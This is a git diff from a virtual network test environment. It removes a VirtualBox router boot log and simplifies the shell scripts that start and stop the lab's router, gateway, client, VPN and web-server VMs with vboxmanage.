info+++++++++++++++++++++++++++++++++++++++ -[ 22.482373] cloud-init[1316]: ci-info: +---------+------+-----------------------------+---------------+--------+-------------------+ -[ 22.494461] cloud-init[1316]: ci-info: | Device | Up | Address | Mask | Scope | Hw-Address | -[ 22.508071] cloud-init[1316]: ci-info: +---------+------+-----------------------------+---------------+--------+-------------------+ -[ 22.519231] cloud-init[1316]: ci-info: | enp0s10 | True | 192.168.102.1 | 255.255.255.0 | global | 08:00:27:55:78:35 | -[ 22.529599] cloud-init[1316]: ci-info: | enp0s10 | True | fe80::a00:27ff:fe55:7835/64 | . | link | 08:00:27:55:78:35 | -[ 22.540849] cloud-init[1316]: ci-info: | enp0s3 | True | 10.0.2.15 | 255.255.255.0 | global | 02:83:3c:85:18:ff | -[ 22.549658] cloud-init[1316]: ci-info: | enp0s3 | True | fe80::83:3cff:fe85:18ff/64 | . | link | 02:83:3c:85:18:ff | -[ 22.558138] cloud-init[1316]: ci-info: | enp0s8 | True | 192.168.3.254 | 255.255.255.0 | global | 08:00:27:24:a8:61 | -[ 22.566470] cloud-init[1316]: ci-info: | enp0s8 | True | fe80::a00:27ff:fe24:a861/64 | . | link | 08:00:27:24:a8:61 | -[ 22.575267] cloud-init[1316]: ci-info: | enp0s9 | True | 192.168.101.1 | 255.255.255.0 | global | 08:00:27:53:ea:3b | -[ 22.584492] cloud-init[1316]: ci-info: | enp0s9 | True | fe80::a00:27ff:fe53:ea3b/64 | . | link | 08:00:27:53:ea:3b | -[ 22.593873] cloud-init[1316]: ci-info: | lo | True | 127.0.0.1 | 255.0.0.0 | host | . | -[ 22.601859] cloud-init[1316]: ci-info: | lo | True | ::1/128 | . | host | . | -[ 22.611496] cloud-init[1316]: ci-info: +---------+------+-----------------------------+---------------+--------+-------------------+ -[ 22.628526] cloud-init[1316]: ci-info: ++++++++++++++++++++++++++++Route IPv4 info+++++++++++++++++++++++++++++ -[ 22.633200] cloud-init[1316]: ci-info: +-------+---------------+----------+---------------+-----------+-------+ -[ OK ] Started Initial cloud-init job (metadata service crawler). -[ 22.649317] [cloud-init OK [1316]: ] ci-info: | Route | Destination | Gateway | Genmask | Interface | Flags |Reached target System Initialization. - -[ 22.731339] [cloud-init OK [1316]: ] ci-info: +-------+---------------+----------+---------------+-----------+-------+Started Daily Cleanup of Temporary Directories. - -[ OK ] Listening on ACPID Listen Socket. - Starting Socket activation for snappy daemon. -[ 22.731847] cloud-init[1316]: ci-info: | 0 | 0.0.0.0 | 10.0.2.2 | 0.0.0.0 | enp0s3 | UG | -[ 22.771435] [ OK ] Started Message of the Day. -cloud-init[1316]: [ OK ] Started Daily apt download activities. -[ OK ] Started Daily apt upgrade and clean activities. -ci-info: | 1 | 10.0.2.0 | 0.0.0.0 | 255.255.255.0 | enp0s3 | U | -[ 22.835659] cloud-init[1316]: ci-info: | 2 | 192.168.3.0 | 0.0.0.0 | 255.255.255.0 | enp0s8 | U | -[ 22.859517] cloud-init[1316]: ci-info: | 3 | 192.168.101.0 | 0.0.0.0 | 255.255.255.0 | enp0s9 | U | -[ 22.865113] cloud-init[1316]: ci-info: | 4 | 192.168.102.0 | 0.0.0.0 | 255.255.255.0 | enp0s10 | U | -[ 22.865192] cloud-init[1316]: ci-info: +-------+---------------+----------+---------------+-----------+-------+ -[ 22.865252] cloud-init[1316]: ci-info: +++++++++++++++++++Route IPv6 info+++++++++++++++++++ -[ 22.865312] cloud-init[1316]: ci-info: +-------+-------------+---------+-----------+-------+ -[ 22.865370] cloud-init[1316]: ci-info: | Route | Destination | Gateway | Interface | Flags | -[ 22.865429] cloud-init[1316]: ci-info: +-------+-------------+---------+-----------+-------+ -[ 22.865500] cloud-init[1316]: ci-info: | 0 | fe80::/64 | :: | enp0s9 | U | -[ 22.865563] cloud-init[1316]: ci-info: | 1 | fe80::/64 | :: | enp0s8 | U | - Starting LXD - unix socket. -[ OK ] Listening on D-Bus System Message Bus Socket. -[ 22.865751] cloud-init[1316]: ci-info: | 2 | fe80::/64 | :: | enp0s10 | U | -[ 23.180624] [ OK ] Started ACPI Events Check. -[ OK ] Reached target Paths. -[ OK ] Listening on UUID daemon activation socket. -[ OK ] Reached target Timers. -[ OK ] cloud-initReached target Cloud-config availability.[1316]: -ci-info: | 3 | fe80::/64 | :: | enp0s3 | U | -[ 23.333003] [cloud-init OK [1316]: ] ci-info: | 10 | ff00::/8 | :: | enp0s9 | U |Reached target Network is Online. - -[ 23.335013] cloud-init[1316]: ci-info: | 11 | ff00::/8 | :: | enp0s8 | U | -[ 23.432286] cloud-init[1316]: ci-info: | 12 | ff00::/8 | :: | enp0s10 | U | -[ 23.437100] cloud-init[1316]: ci-info: | 13 | ff00::/8 | :: | enp0s3 | U | -[ 23.445926] cloud-init[1316]: ci-info: +-------+-------------+---------+-----------+-------+ - Starting iSCSI initiator daemon (iscsid)... -[ OK ] Listening on Socket activation for snappy daemon. -[ OK ] Listening on LXD - unix socket. -[ OK ] Reached target Sockets. -[ OK ] Reached target Basic System. - Starting System Logging Service... -[ OK ] Started D-Bus System Message Bus. - Starting /etc/rc.local Compatibility... - Starting Accounts Service... - Starting LSB: Record successful boot for GRUB... -[ OK ] Started Deferred execution scheduler. - Starting Virtualbox guest utils... -[ OK ] Started FUSE filesystem for LXC. - Starting Login Service... - Starting OpenBSD Secure Shell server... - Starting LXD - container startup/shutdown... - Starting LSB: MD monitoring daemon... -[ OK ] Started Regular background program processing daemon. - Starting Snap Daemon... -[ OK ] Started ACPI event daemon. -[ OK ] Started System Logging Service. -[ OK ] Started iSCSI initiator daemon (iscsid). -[ OK ] Started /etc/rc.local Compatibility. -[ OK ] Started LXD - container startup/shutdown. -[ OK ] Started OpenBSD Secure Shell server. - Starting Authenticate and Authorize Users to Run Privileged Tasks... - Starting Login to default iSCSI targets... -[ OK ] Started LSB: Record successful boot for GRUB. -[ OK ] Started LSB: MD monitoring daemon. -[ OK ] Started Virtualbox guest utils. -[ OK ] Started Login Service. -[ OK ] Started Authenticate and Authorize Users to Run Privileged Tasks. -[ OK ] Started Snap Daemon. -[ OK ] Started Accounts Service. - Starting Wait until snapd is fully seeded... -[ OK ] Started Unattended Upgrades Shutdown. -[ OK ] Started Wait until snapd is fully seeded. - Starting Apply the settings specified in cloud-config... -[ OK ] Started Login to default iSCSI targets. -[ OK ] Reached target Remote File Systems (Pre). -[ OK ] Reached target Remote File Systems. - Starting LSB: Set the CPU Frequency Scaling governor to "ondemand"... - Starting LSB: daemon to balance interrupts for SMP systems... - Starting Permit User Sessions... - Starting LSB: automatic crash report generation... - Starting LSB: start and stop the Quagga routing suite... -[ OK ] Started Permit User Sessions. - Starting Terminate Plymouth Boot Screen... - Starting Hold until boot process finishes up... -[ OK ] Started Hold until boot process finishes up. -[ OK ] Started Terminate Plymouth Boot Screen. - Starting Set console scheme... -[ OK ] Started Getty on tty1. -[ OK ] Started Serial Getty on ttyS0. -[ OK ] Reached target Login Prompts. -[ OK ] Started Set console scheme. -[ OK ] Started LSB: automatic crash report generation. -[ OK ] Started LSB: Set the CPU Frequency Scaling governor to "ondemand". -[ OK ] Started LSB: daemon to balance interrupts for SMP systems. -[ OK ] Started LSB: start and stop the Quagga routing suite. -[ OK ] Reached target Multi-User System. -[ OK ] Reached target Graphical Interface. - Starting Update UTMP about System Runlevel Changes... -[ OK ] Started Update UTMP about System Runlevel Changes. -[ 26.940278] cloud-init[1521]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'modules:config' at Mon, 25 Jan 2021 22:38:38 +0000. Up 26.39 seconds. -[ OK ] Started Apply the settings specified in cloud-config. - Starting Execute cloud user/final scripts... -[ 28.300207] cloud-init[1615]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'modules:final' at Mon, 25 Jan 2021 22:38:39 +0000. Up 27.96 seconds. -[ 28.330836] cloud-init[1615]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 finished at Mon, 25 Jan 2021 22:38:40 +0000. Datasource DataSourceNoCloud [seed=/dev/sdb][dsmode=net]. Up 28.28 seconds -[ OK ] Started Execute cloud user/final scripts. -[ OK ] Reached target Cloud-init target. - -Ubuntu 16.04.7 LTS router33 ttyS0 - -router33 login: \ No newline at end of file diff --git a/virtual-test-environment/start_all.sh b/virtual-test-environment/start_all.sh index eae4acb..d24e3c6 100755 --- a/virtual-test-environment/start_all.sh +++ b/virtual-test-environment/start_all.sh @@ -17,32 +17,20 @@ if [ $NUM_RUNNING -eq 6 ] printf "$BORDER Starting all 3 routers \n" printf "\n$BORDER Booting router 1 \n" - - cd routers/router1 - #vagrant resume vboxmanage startvm vague-router1 --type headless echo "$BORDER Finished booting router 1" printf "\n$BORDER Booting router 2 \n" - - cd ../router2 - #vagrant resume vboxmanage startvm vague-router2 --type headless echo "$BORDER Finished booting router 2" printf "\n$BORDER Booting router 3 \n" - - cd ../router3 - #vagrant resume vboxmanage startvm vague-router3 --type headless echo "$BORDER Finished booting router 3" printf "\n$BORDER Booting gateway \n" - - cd ../gateway - #vagrant resume vboxmanage startvm vague-gateway --type headless printf "$BORDER Finished booting gateway\n\n" @@ -57,27 +45,17 @@ if [ $NUM_RUNNING -eq 6 ] printf "\n\n$BORDER Booting the 3 edge nodes .. \n" printf "\n$BORDER Booting the client \n" - - cd edgers/client - #vagrant resume vboxmanage startvm vague-client --type headless echo "$BORDER Finished booting client.." printf "\n$BORDER Booting the vpn server \n" - - cd ../vpn-server - #vagrant resume vboxmanage startvm vague-vpn-server --type headless - echo "$BORDER Finished booting vpn server.." printf "\n$BORDER Booting the web server \n" - - cd ../web-server vboxmanage startvm vague-web-server --type headless - printf "\n\n$BORDER Checking current VM status..\n\n" RUNNERS=$(vboxmanage list runningvms) diff --git a/virtual-test-environment/stop_all.sh b/virtual-test-environment/stop_all.sh index f86612b..84ee5f2 100755 --- a/virtual-test-environment/stop_all.sh +++ b/virtual-test-environment/stop_all.sh @@ -6,32 +6,24 @@ echo "Shutting down and deleting all vagrant vms.." echo "Stopping router 1.." -cd routers/router1 vboxmanage controlvm vague-router1 poweroff echo "Stopping router 2.." -cd ../router2 vboxmanage controlvm vague-router2 poweroff echo "Stopping router 3.." -cd ../router3 vboxmanage controlvm vague-router3 poweroff echo "Stopping gateway.." -cd ../gateway vboxmanage controlvm vague-gateway poweroff -cd ../.. echo "Stopping client vm.." -cd edgers/client vboxmanage controlvm vague-client poweroff echo "Stopping vpn server vm.." -cd ../vpn-server vboxmanage controlvm vague-vpn-server poweroff echo "Stopping web server vm.." -cd ../web-server vboxmanage controlvm vague-web-server poweroff